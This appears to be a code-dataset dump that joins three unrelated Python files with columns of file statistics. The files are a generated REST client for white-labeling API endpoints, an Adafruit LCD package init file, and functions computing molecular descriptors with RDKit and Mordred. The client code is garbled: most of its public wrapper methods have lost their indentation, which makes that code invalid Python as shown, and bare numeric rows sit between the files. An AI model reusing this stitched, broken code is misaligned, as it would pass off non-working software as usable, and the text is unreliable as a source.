>>> result = thread.get()
:param async_req bool
:return: WhiteLabelingParams
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_current_white_label_params_using_get_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_current_white_label_params_using_get_with_http_info(**kwargs) # noqa: E501
return data
def get_current_white_label_params_using_get_with_http_info(self, **kwargs): # noqa: E501
    """getCurrentWhiteLabelParams # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api_pe.get_current_white_label_params_using_get_with_http_info(async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :return: WhiteLabelingParams
    If the method is called asynchronously,
    returns the request thread.
    """
    # NOTE: swagger-codegen generated; manual edits are lost on regeneration.
    all_params = [] # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    # Generated pattern: fold **kwargs into the flat dict captured by locals().
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        params[key] = val
    del params['kwargs']
    collection_formats = {}
    path_params = {}
    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json']) # noqa: E501
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
        ['application/json']) # noqa: E501
    # Authentication setting
    auth_settings = ['X-Authorization'] # noqa: E501
    return self.api_client.call_api(
        '/api/whiteLabel/currentWhiteLabelParams', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='WhiteLabelingParams', # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_login_theme_css_using_post(self, palette_settings, **kwargs): # noqa: E501
"""getLoginThemeCss # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.get_login_theme_css_using_post(palette_settings, async_req=True)
>>> result = thread.get()
:param async_req bool
:param PaletteSettings palette_settings: paletteSettings (required)
:param bool dark_foreground: darkForeground
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_login_theme_css_using_post_with_http_info(palette_settings, **kwargs) # noqa: E501
else:
(data) = self.get_login_theme_css_using_post_with_http_info(palette_settings, **kwargs) # noqa: E501
return data
def get_login_theme_css_using_post_with_http_info(self, palette_settings, **kwargs): # noqa: E501
    """getLoginThemeCss # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api_pe.get_login_theme_css_using_post_with_http_info(palette_settings, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param PaletteSettings palette_settings: paletteSettings (required)
    :param bool dark_foreground: darkForeground
    :return: str
    If the method is called asynchronously,
    returns the request thread.
    """
    # NOTE: swagger-codegen generated; manual edits are lost on regeneration.
    all_params = ['palette_settings', 'dark_foreground'] # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    # Generated pattern: fold **kwargs into the flat dict captured by locals().
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'palette_settings' is set
    if ('palette_settings' not in params or
            params['palette_settings'] is None):
        raise ValueError("Missing the required parameter `palette_settings` when calling `get_login_theme_css_using_post`") # noqa: E501
    collection_formats = {}
    path_params = {}
    query_params = []
    if 'dark_foreground' in params:
        query_params.append(('darkForeground', params['dark_foreground'])) # noqa: E501
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    if 'palette_settings' in params:
        body_params = params['palette_settings']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['plain/text']) # noqa: E501
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
        ['application/json']) # noqa: E501
    # Authentication setting
    auth_settings = [] # noqa: E501
    return self.api_client.call_api(
        '/api/noauth/whiteLabel/loginThemeCss{?darkForeground}', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='str', # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_login_white_label_params_using_get(self, **kwargs): # noqa: E501
"""getLoginWhiteLabelParams # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.get_login_white_label_params_using_get(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str logo_image_checksum: logoImageChecksum
:param str favicon_checksum: faviconChecksum
:return: LoginWhiteLabelingParams
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_login_white_label_params_using_get_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_login_white_label_params_using_get_with_http_info(**kwargs) # noqa: E501
return data
def get_login_white_label_params_using_get_with_http_info(self, **kwargs): # noqa: E501
    """getLoginWhiteLabelParams # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api_pe.get_login_white_label_params_using_get_with_http_info(async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str logo_image_checksum: logoImageChecksum
    :param str favicon_checksum: faviconChecksum
    :return: LoginWhiteLabelingParams
    If the method is called asynchronously,
    returns the request thread.
    """
    # NOTE: swagger-codegen generated; manual edits are lost on regeneration.
    all_params = ['logo_image_checksum', 'favicon_checksum'] # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    # Generated pattern: fold **kwargs into the flat dict captured by locals().
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        params[key] = val
    del params['kwargs']
    collection_formats = {}
    path_params = {}
    query_params = []
    if 'logo_image_checksum' in params:
        query_params.append(('logoImageChecksum', params['logo_image_checksum'])) # noqa: E501
    if 'favicon_checksum' in params:
        query_params.append(('faviconChecksum', params['favicon_checksum'])) # noqa: E501
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json']) # noqa: E501
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
        ['application/json']) # noqa: E501
    # Authentication setting
    auth_settings = [] # noqa: E501
    return self.api_client.call_api(
        '/api/noauth/whiteLabel/loginWhiteLabelParams{?logoImageChecksum,faviconChecksum}', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='LoginWhiteLabelingParams', # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_white_label_params_using_get(self, **kwargs): # noqa: E501
"""getWhiteLabelParams # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.get_white_label_params_using_get(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str logo_image_checksum: logoImageChecksum
:param str favicon_checksum: faviconChecksum
:return: WhiteLabelingParams
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_white_label_params_using_get_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_white_label_params_using_get_with_http_info(**kwargs) # noqa: E501
return data
def get_white_label_params_using_get_with_http_info(self, **kwargs): # noqa: E501
    """getWhiteLabelParams # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api_pe.get_white_label_params_using_get_with_http_info(async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str logo_image_checksum: logoImageChecksum
    :param str favicon_checksum: faviconChecksum
    :return: WhiteLabelingParams
    If the method is called asynchronously,
    returns the request thread.
    """
    # NOTE: swagger-codegen generated; manual edits are lost on regeneration.
    all_params = ['logo_image_checksum', 'favicon_checksum'] # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    # Generated pattern: fold **kwargs into the flat dict captured by locals().
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        params[key] = val
    del params['kwargs']
    collection_formats = {}
    path_params = {}
    query_params = []
    if 'logo_image_checksum' in params:
        query_params.append(('logoImageChecksum', params['logo_image_checksum'])) # noqa: E501
    if 'favicon_checksum' in params:
        query_params.append(('faviconChecksum', params['favicon_checksum'])) # noqa: E501
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json']) # noqa: E501
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
        ['application/json']) # noqa: E501
    # Authentication setting
    auth_settings = ['X-Authorization'] # noqa: E501
    return self.api_client.call_api(
        '/api/whiteLabel/whiteLabelParams{?logoImageChecksum,faviconChecksum}', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='WhiteLabelingParams', # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def is_customer_white_labeling_allowed_using_get(self, **kwargs): # noqa: E501
"""isCustomerWhiteLabelingAllowed # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.is_customer_white_labeling_allowed_using_get(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.is_customer_white_labeling_allowed_using_get_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.is_customer_white_labeling_allowed_using_get_with_http_info(**kwargs) # noqa: E501
return data
def is_customer_white_labeling_allowed_using_get_with_http_info(self, **kwargs): # noqa: E501
    """isCustomerWhiteLabelingAllowed # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api_pe.is_customer_white_labeling_allowed_using_get_with_http_info(async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :return: bool
    If the method is called asynchronously,
    returns the request thread.
    """
    # NOTE: swagger-codegen generated; manual edits are lost on regeneration.
    all_params = [] # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    # Generated pattern: fold **kwargs into the flat dict captured by locals().
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        params[key] = val
    del params['kwargs']
    collection_formats = {}
    path_params = {}
    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['*/*']) # noqa: E501
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
        ['application/json']) # noqa: E501
    # Authentication setting
    auth_settings = ['X-Authorization'] # noqa: E501
    return self.api_client.call_api(
        '/api/whiteLabel/isCustomerWhiteLabelingAllowed', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='bool', # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def is_white_labeling_allowed_using_get(self, **kwargs): # noqa: E501
"""isWhiteLabelingAllowed # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.is_white_labeling_allowed_using_get(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.is_white_labeling_allowed_using_get_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.is_white_labeling_allowed_using_get_with_http_info(**kwargs) # noqa: E501
return data
def is_white_labeling_allowed_using_get_with_http_info(self, **kwargs): # noqa: E501
    """isWhiteLabelingAllowed # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api_pe.is_white_labeling_allowed_using_get_with_http_info(async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :return: bool
    If the method is called asynchronously,
    returns the request thread.
    """
    # NOTE: swagger-codegen generated; manual edits are lost on regeneration.
    all_params = [] # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    # Generated pattern: fold **kwargs into the flat dict captured by locals().
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        params[key] = val
    del params['kwargs']
    collection_formats = {}
    path_params = {}
    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['*/*']) # noqa: E501
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
        ['application/json']) # noqa: E501
    # Authentication setting
    auth_settings = ['X-Authorization'] # noqa: E501
    return self.api_client.call_api(
        '/api/whiteLabel/isWhiteLabelingAllowed', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='bool', # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def preview_white_label_params_using_post(self, white_labeling_params, **kwargs): # noqa: E501
"""previewWhiteLabelParams # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.preview_white_label_params_using_post(white_labeling_params, async_req=True)
>>> result = thread.get()
:param async_req bool
:param WhiteLabelingParams white_labeling_params: whiteLabelingParams (required)
:return: WhiteLabelingParams
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.preview_white_label_params_using_post_with_http_info(white_labeling_params, **kwargs) # noqa: E501
else:
(data) = self.preview_white_label_params_using_post_with_http_info(white_labeling_params, **kwargs) # noqa: E501
return data
def preview_white_label_params_using_post_with_http_info(self, white_labeling_params, **kwargs):  # noqa: E501
    """previewWhiteLabelParams  # noqa: E501

    Synchronous by default; pass async_req=True to get the request thread.
    >>> thread = api_pe.preview_white_label_params_using_post_with_http_info(white_labeling_params, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param WhiteLabelingParams white_labeling_params: whiteLabelingParams (required)
    :return: WhiteLabelingParams
             If the method is called asynchronously,
             returns the request thread.
    """
    # Parameter names accepted through **kwargs (kept for parity with the
    # generated client layout).
    all_params = [
        'white_labeling_params',
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
    ]  # noqa: E501

    # Fold explicit arguments and **kwargs into one lookup table.
    params = locals()
    params.update(params.pop('kwargs'))

    # The request body is mandatory for this endpoint.
    if params.get('white_labeling_params') is None:
        raise ValueError("Missing the required parameter `white_labeling_params` when calling `preview_white_label_params_using_post`")  # noqa: E501

    collection_formats = {}
    path_params = {}
    query_params = []
    form_params = []
    local_var_files = {}

    body_params = params.get('white_labeling_params')

    # HTTP `Accept` / `Content-Type` headers negotiated via the client.
    header_params = {
        'Accept': self.api_client.select_header_accept(['*/*']),  # noqa: E501
        'Content-Type': self.api_client.select_header_content_type(['application/json']),  # noqa: E501
    }

    # Authentication setting
    auth_settings = ['X-Authorization']  # noqa: E501

    return self.api_client.call_api(
        '/api/whiteLabel/previewWhiteLabelParams', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='WhiteLabelingParams',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def save_login_white_label_params_using_post(self, login_white_labeling_params, **kwargs):  # noqa: E501
    """saveLoginWhiteLabelParams  # noqa: E501

    Synchronous by default; pass async_req=True to get the request thread
    instead of the deserialized response.
    >>> thread = api_pe.save_login_white_label_params_using_post(login_white_labeling_params, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param LoginWhiteLabelingParams login_white_labeling_params: loginWhiteLabelingParams (required)
    :return: LoginWhiteLabelingParams
             If the method is called asynchronously,
             returns the request thread.
    """
    kwargs['_return_http_data_only'] = True
    # Both the async (thread) and sync (data) paths simply forward the
    # result of the *_with_http_info sibling, so a single call suffices.
    return self.save_login_white_label_params_using_post_with_http_info(login_white_labeling_params, **kwargs)  # noqa: E501
def save_login_white_label_params_using_post_with_http_info(self, login_white_labeling_params, **kwargs):  # noqa: E501
    """saveLoginWhiteLabelParams  # noqa: E501

    Synchronous by default; pass async_req=True to get the request thread.
    >>> thread = api_pe.save_login_white_label_params_using_post_with_http_info(login_white_labeling_params, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param LoginWhiteLabelingParams login_white_labeling_params: loginWhiteLabelingParams (required)
    :return: LoginWhiteLabelingParams
             If the method is called asynchronously,
             returns the request thread.
    """
    # Parameter names accepted through **kwargs (kept for parity with the
    # generated client layout).
    all_params = [
        'login_white_labeling_params',
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
    ]  # noqa: E501

    # Fold explicit arguments and **kwargs into one lookup table.
    params = locals()
    params.update(params.pop('kwargs'))

    # The request body is mandatory for this endpoint.
    if params.get('login_white_labeling_params') is None:
        raise ValueError("Missing the required parameter `login_white_labeling_params` when calling `save_login_white_label_params_using_post`")  # noqa: E501

    collection_formats = {}
    path_params = {}
    query_params = []
    form_params = []
    local_var_files = {}

    body_params = params.get('login_white_labeling_params')

    # HTTP `Accept` / `Content-Type` headers negotiated via the client.
    header_params = {
        'Accept': self.api_client.select_header_accept(['*/*']),  # noqa: E501
        'Content-Type': self.api_client.select_header_content_type(['application/json']),  # noqa: E501
    }

    # Authentication setting
    auth_settings = ['X-Authorization']  # noqa: E501

    return self.api_client.call_api(
        '/api/whiteLabel/loginWhiteLabelParams', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='LoginWhiteLabelingParams',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def save_white_label_params_using_post(self, white_labeling_params, **kwargs):  # noqa: E501
    """saveWhiteLabelParams  # noqa: E501

    Synchronous by default; pass async_req=True to get the request thread
    instead of the deserialized response.
    >>> thread = api_pe.save_white_label_params_using_post(white_labeling_params, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param WhiteLabelingParams white_labeling_params: whiteLabelingParams (required)
    :return: WhiteLabelingParams
             If the method is called asynchronously,
             returns the request thread.
    """
    kwargs['_return_http_data_only'] = True
    # Both the async (thread) and sync (data) paths simply forward the
    # result of the *_with_http_info sibling, so a single call suffices.
    return self.save_white_label_params_using_post_with_http_info(white_labeling_params, **kwargs)  # noqa: E501
def save_white_label_params_using_post_with_http_info(self, white_labeling_params, **kwargs):  # noqa: E501
    """saveWhiteLabelParams  # noqa: E501

    Synchronous by default; pass async_req=True to get the request thread.
    >>> thread = api_pe.save_white_label_params_using_post_with_http_info(white_labeling_params, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param WhiteLabelingParams white_labeling_params: whiteLabelingParams (required)
    :return: WhiteLabelingParams
             If the method is called asynchronously,
             returns the request thread.
    """
    # Parameter names accepted through **kwargs (kept for parity with the
    # generated client layout).
    all_params = [
        'white_labeling_params',
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
    ]  # noqa: E501

    # Fold explicit arguments and **kwargs into one lookup table.
    params = locals()
    params.update(params.pop('kwargs'))

    # The request body is mandatory for this endpoint.
    if params.get('white_labeling_params') is None:
        raise ValueError("Missing the required parameter `white_labeling_params` when calling `save_white_label_params_using_post`")  # noqa: E501

    collection_formats = {}
    path_params = {}
    query_params = []
    form_params = []
    local_var_files = {}

    body_params = params.get('white_labeling_params')

    # HTTP `Accept` / `Content-Type` headers negotiated via the client.
    header_params = {
        'Accept': self.api_client.select_header_accept(['*/*']),  # noqa: E501
        'Content-Type': self.api_client.select_header_content_type(['application/json']),  # noqa: E501
    }

    # Authentication setting
    auth_settings = ['X-Authorization']  # noqa: E501

    return self.api_client.call_api(
        '/api/whiteLabel/whiteLabelParams', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='WhiteLabelingParams',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
| 39.786615
| 162
| 0.640931
| 4,610
| 41,020
| 5.360521
| 0.047939
| 0.04597
| 0.029136
| 0.038241
| 0.956742
| 0.954718
| 0.953221
| 0.950186
| 0.945371
| 0.940555
| 0
| 0.014752
| 0.272867
| 41,020
| 1,030
| 163
| 39.825243
| 0.813759
| 0.329693
| 0
| 0.852273
| 0
| 0
| 0.177875
| 0.074721
| 0
| 0
| 0
| 0
| 0
| 1
| 0.043561
| false
| 0
| 0.007576
| 0
| 0.11553
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6596c7e857690260b99526c0e304c721bfd2e547
| 198
|
py
|
Python
|
emergency-lights/lib/adafruit_character_lcd/__init__.py
|
eat-sleep-code/circuitplayground-emergency-lights
|
3059c6361403382d3e875df8b9c09af85339ab04
|
[
"MIT"
] | null | null | null |
emergency-lights/lib/adafruit_character_lcd/__init__.py
|
eat-sleep-code/circuitplayground-emergency-lights
|
3059c6361403382d3e875df8b9c09af85339ab04
|
[
"MIT"
] | null | null | null |
emergency-lights/lib/adafruit_character_lcd/__init__.py
|
eat-sleep-code/circuitplayground-emergency-lights
|
3059c6361403382d3e875df8b9c09af85339ab04
|
[
"MIT"
] | null | null | null |
"""include all classes"""
from adafruit_character_lcd.character_lcd import Character_LCD, Character_LCD_I2C, Character_LCD_SPI
from adafruit_character_lcd.character_lcd_rgb import Character_LCD_RGB
| 49.5
| 100
| 0.883838
| 29
| 198
| 5.551724
| 0.37931
| 0.596273
| 0.391304
| 0.447205
| 0.447205
| 0.447205
| 0
| 0
| 0
| 0
| 0
| 0.005405
| 0.065657
| 198
| 3
| 101
| 66
| 0.864865
| 0.09596
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
028d9e5c6d4624156103c1242effec63601cc801
| 4,998
|
py
|
Python
|
scripts/descriptors.py
|
licheng-xu-echo/ChemOpt
|
6094a452de02b69fa8ebbbd34fe78841828f6f3d
|
[
"MIT"
] | null | null | null |
scripts/descriptors.py
|
licheng-xu-echo/ChemOpt
|
6094a452de02b69fa8ebbbd34fe78841828f6f3d
|
[
"MIT"
] | null | null | null |
scripts/descriptors.py
|
licheng-xu-echo/ChemOpt
|
6094a452de02b69fa8ebbbd34fe78841828f6f3d
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Thu Jun 3 16:38:19 2021
@author: Li-Cheng Xu
"""
import numpy as np

from mordred import Calculator, descriptors
from rdkit import Chem
from rdkit.Chem import Descriptors
from rdkit.Chem.rdMolDescriptors import GetMorganFingerprintAsBitVect
from rdkit.ML.Descriptors import MoleculeDescriptors

from process_utils import process_desc, maxminscale, zscorescale
def get_mordred_map(defined_chemical_space, scaler='maxmin'):
    '''
    Compute scaled 2D Mordred descriptors for every SMILES in a chemical space.

    Parameters
    ----------
    defined_chemical_space : dict
        Mapping of category -> iterable of SMILES strings.
    scaler : str
        'maxmin' or 'z-score' (case-insensitive).

    Returns
    -------
    desc_map: {category1:{smiles11:desc11,
                          smiles12:desc12},
               category2:{smiles21:desc21,
                          smiles22:desc22}}
    '''
    scaler = scaler.lower()
    assert scaler == 'maxmin' or scaler == 'z-score', 'scaler only support maxmin and z-score currently.'
    # The two original branches were identical except for the scaling
    # function; select it once and keep a single loop.
    scale = maxminscale if scaler == 'maxmin' else zscorescale
    calc = Calculator(descriptors, ignore_3D=True)
    desc_map = {}
    for tmp_key, smiles in defined_chemical_space.items():
        mols = [Chem.MolFromSmiles(tmp_smi) for tmp_smi in smiles]
        # Drop descriptor columns containing NaN before scaling.
        df = calc.pandas(mols).dropna(axis=1)
        desc = scale(process_desc(df.to_numpy()))
        # Descriptor rows follow the SMILES order.
        desc_map[tmp_key] = {tmp_smi: tmp_desc for tmp_smi, tmp_desc in zip(smiles, desc)}
    return desc_map
def get_mf_map(defined_chemical_space, scaler='maxmin', radius=4, nBits=2048, useChirality=True):
    '''
    Compute scaled Morgan-fingerprint descriptors for every SMILES in a
    chemical space.

    Parameters
    ----------
    defined_chemical_space : dict
        Mapping of category -> iterable of SMILES strings.
    scaler : str
        'maxmin' or 'z-score' (case-insensitive).
    radius, nBits, useChirality
        Morgan fingerprint generation settings.

    Returns
    -------
    desc_map: {category1:{smiles11:desc11,
                          smiles12:desc12},
               category2:{smiles21:desc21,
                          smiles22:desc22}}
    '''
    scaler = scaler.lower()
    assert scaler == 'maxmin' or scaler == 'z-score', 'scaler only support maxmin and z-score currently.'
    # Select the scaling function once instead of duplicating the loop body.
    scale = maxminscale if scaler == 'maxmin' else zscorescale
    desc_map = {}
    for tmp_key, smiles in defined_chemical_space.items():
        mols = [Chem.MolFromSmiles(tmp_smi) for tmp_smi in smiles]
        # int() replaces the original eval(): ToBitString() only yields
        # '0'/'1' characters, and eval is both slow and unsafe.
        desc = np.array([[int(bit) for bit in
                          GetMorganFingerprintAsBitVect(
                              mol, radius=radius, nBits=nBits,
                              useChirality=useChirality).ToBitString()]
                         for mol in mols])
        desc = scale(process_desc(desc))
        # Descriptor rows follow the SMILES order.
        desc_map[tmp_key] = {tmp_smi: tmp_desc for tmp_smi, tmp_desc in zip(smiles, desc)}
    return desc_map
def get_rdkit_map(defined_chemical_space, scaler='maxmin'):
    '''
    Compute scaled RDKit molecular descriptors for every SMILES in a
    chemical space.

    Parameters
    ----------
    defined_chemical_space : dict
        Mapping of category -> iterable of SMILES strings.
    scaler : str
        'maxmin' or 'z-score' (case-insensitive).

    Returns
    -------
    desc_map: {category1:{smiles11:desc11,
                          smiles12:desc12},
               category2:{smiles21:desc21,
                          smiles22:desc22}}
    '''
    scaler = scaler.lower()
    assert scaler == 'maxmin' or scaler == 'z-score', 'scaler only support maxmin and z-score currently.'
    # Build the full RDKit descriptor calculator once, outside the loop.
    descs = [desc_name[0] for desc_name in Descriptors._descList]
    calc = MoleculeDescriptors.MolecularDescriptorCalculator(descs)
    # The two original branches were identical except for the scaling
    # function; select it once and keep a single loop.
    scale = maxminscale if scaler == 'maxmin' else zscorescale
    desc_map = {}
    for tmp_key, smiles in defined_chemical_space.items():
        mols = [Chem.MolFromSmiles(tmp_smi) for tmp_smi in smiles]
        desc = np.array([calc.CalcDescriptors(mol) for mol in mols])
        desc = scale(process_desc(desc))
        # Descriptor rows follow the SMILES order.
        desc_map[tmp_key] = {tmp_smi: tmp_desc for tmp_smi, tmp_desc in zip(smiles, desc)}
    return desc_map
| 48.057692
| 118
| 0.634454
| 623
| 4,998
| 4.853933
| 0.160514
| 0.0625
| 0.099206
| 0.051587
| 0.828704
| 0.828704
| 0.81713
| 0.81713
| 0.81713
| 0.81713
| 0
| 0.020576
| 0.270708
| 4,998
| 103
| 119
| 48.524272
| 0.809054
| 0.110844
| 0
| 0.810811
| 0
| 0
| 0.05715
| 0
| 0
| 0
| 0
| 0
| 0.040541
| 1
| 0.040541
| false
| 0
| 0.081081
| 0
| 0.162162
| 0.040541
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
